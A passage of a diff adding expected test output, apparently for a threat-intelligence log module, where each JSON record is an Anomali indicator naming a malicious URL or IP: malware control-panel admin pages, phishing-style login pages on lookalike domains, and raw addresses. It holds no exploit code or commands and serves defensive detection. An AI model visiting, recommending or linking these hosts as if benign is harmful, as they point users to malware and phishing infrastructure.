+ "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 35346, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-66" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:16.358Z", + "threatintel.anomali.name": "mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:16.358Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "thaubenuocngam.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 36034, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:32.126Z", + "threatintel.anomali.name": "mal_url: http://suspiciousactivity.xyz/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://suspiciousactivity.xyz/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:32.126Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "suspiciousactivity.xyz", + "threatintel.indicator.url.original": "http://suspiciousactivity.xyz/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 36604, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:37.603Z", + "threatintel.anomali.name": "mal_url: http://217.8.117.8/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://217.8.117.8/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:37.603Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "217.8.117.8", + "threatintel.indicator.url.original": "http://217.8.117.8/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 37152, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-71" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:37.643Z", + "threatintel.anomali.name": "mal_url: http://f0387550.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0387550.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:37.643Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0387550.xsph.ru", + "threatintel.indicator.url.original": "http://f0387550.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 37767, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-84" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:39.465Z", + "threatintel.anomali.name": "mal_url: http://lf4e4abf.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:39.465Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "lf4e4abf.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://lf4e4abf.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 38372, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-81" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:02.031Z", + "threatintel.anomali.name": "mal_ip: 206.217.131.245", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '206.217.131.245']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:02.031Z", + "threatintel.indicator.ip": "206.217.131.245", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 38925, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-52" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:15.878Z", + "threatintel.anomali.name": "mal_url: http://67.215.224.101/a1/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://67.215.224.101/a1/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:15.878Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "67.215.224.101", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://67.215.224.101/a1/panel/admin.php", + "threatintel.indicator.url.path": "/a1/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 39521, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-58" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:29.155Z", + "threatintel.anomali.name": "mal_ip: 162.241.73.163", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '162.241.73.163']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:29.155Z", + "threatintel.indicator.ip": "162.241.73.163", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 40072, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-78" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:50.233Z", + "threatintel.anomali.name": "mal_url: http://l60bdd58.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://l60bdd58.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:50.233Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "l60bdd58.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://l60bdd58.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 40677, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-25" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:50.255Z", + "threatintel.anomali.name": "mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://107.175.150.73/~giftioz/.azma/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:50.255Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "107.175.150.73", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://107.175.150.73/~giftioz/.azma/panel/admin.php", + "threatintel.indicator.url.path": "/~giftioz/.azma/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 41300, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-78" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:52.536Z", + "threatintel.anomali.name": "mal_url: http://5.188.60.52/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://5.188.60.52/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:52.536Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "5.188.60.52", + "threatintel.indicator.url.original": "http://5.188.60.52/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 41865, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-85" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:54.784Z", + "threatintel.anomali.name": "mal_url: http://trotdeiman.ga/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://trotdeiman.ga/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:54.784Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "trotdeiman.ga", + "threatintel.indicator.url.original": "http://trotdeiman.ga/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 42434, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-24T02:59:54.815Z", + "threatintel.anomali.name": "mal_ip: 217.8.117.8", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '217.8.117.8']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:59:54.815Z", + "threatintel.indicator.ip": "217.8.117.8", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 42960, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-83" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:01.726Z", + "threatintel.anomali.name": "mal_ip: 104.223.170.113", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '104.223.170.113']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:01.726Z", + "threatintel.indicator.ip": "104.223.170.113", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 43521, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-58" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:01.762Z", + "threatintel.anomali.name": "mal_url: http://tavim.org/includes/firmino/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://tavim.org/includes/firmino/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:01.762Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "tavim.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://tavim.org/includes/firmino/admin.php", + "threatintel.indicator.url.path": "/includes/firmino/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 44126, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-84" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:10.928Z", + "threatintel.anomali.name": "mal_url: http://onlinesecuritycenter.xyz/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://onlinesecuritycenter.xyz/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:10.928Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "onlinesecuritycenter.xyz", + "threatintel.indicator.url.original": "http://onlinesecuritycenter.xyz/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 44700, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-81" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:20.166Z", + "threatintel.anomali.name": "mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:20.166Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "oaa-my.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/cutter/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 45330, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-90" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:24.048Z", + "threatintel.anomali.name": "mal_url: http://jumbajumbadun.fun/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://jumbajumbadun.fun/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:24.048Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "jumbajumbadun.fun", + "threatintel.indicator.url.original": "http://jumbajumbadun.fun/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 45890, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-58" + ], + "threatintel.anomali.modified": "2020-01-24T03:00:55.816Z", + "threatintel.anomali.name": "mal_url: http://tavim.org/includes/salah/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://tavim.org/includes/salah/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:00:55.816Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "tavim.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://tavim.org/includes/salah/admin.php", + "threatintel.indicator.url.path": "/includes/salah/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 46491, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-80" + ], + "threatintel.anomali.modified": "2020-01-24T03:01:10.501Z", + "threatintel.anomali.name": "mal_url: http://l0c23205.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://l0c23205.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:01:10.501Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "l0c23205.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://l0c23205.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 47096, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-83" + ], + "threatintel.anomali.modified": "2020-01-24T03:01:10.518Z", + "threatintel.anomali.name": "mal_url: http://l535e9e5.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://l535e9e5.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:01:10.518Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "l535e9e5.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://l535e9e5.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 47701, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-24T03:01:14.843Z", + "threatintel.anomali.name": "mal_ip: 217.8.117.47", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '217.8.117.47']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T03:01:14.843Z", + "threatintel.indicator.ip": "217.8.117.47", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 48229, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-67" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:12.699Z", + "threatintel.anomali.name": "mal_url: http://46.161.27.57/northon/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://46.161.27.57/northon/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:12.699Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "46.161.27.57", + "threatintel.indicator.url.original": "http://46.161.27.57/northon/", + "threatintel.indicator.url.path": "/northon/", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 48824, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-90" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:28.034Z", + "threatintel.anomali.name": "mal_url: http://104.168.99.170/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://104.168.99.170/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:28.034Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "104.168.99.170", + "threatintel.indicator.url.original": "http://104.168.99.170/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 49397, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:38.187Z", + "threatintel.anomali.name": "mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:38.187Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "officelog.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://officelog.org/inc/js/jstree/scan/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/scan/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 50023, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-65" + ], + 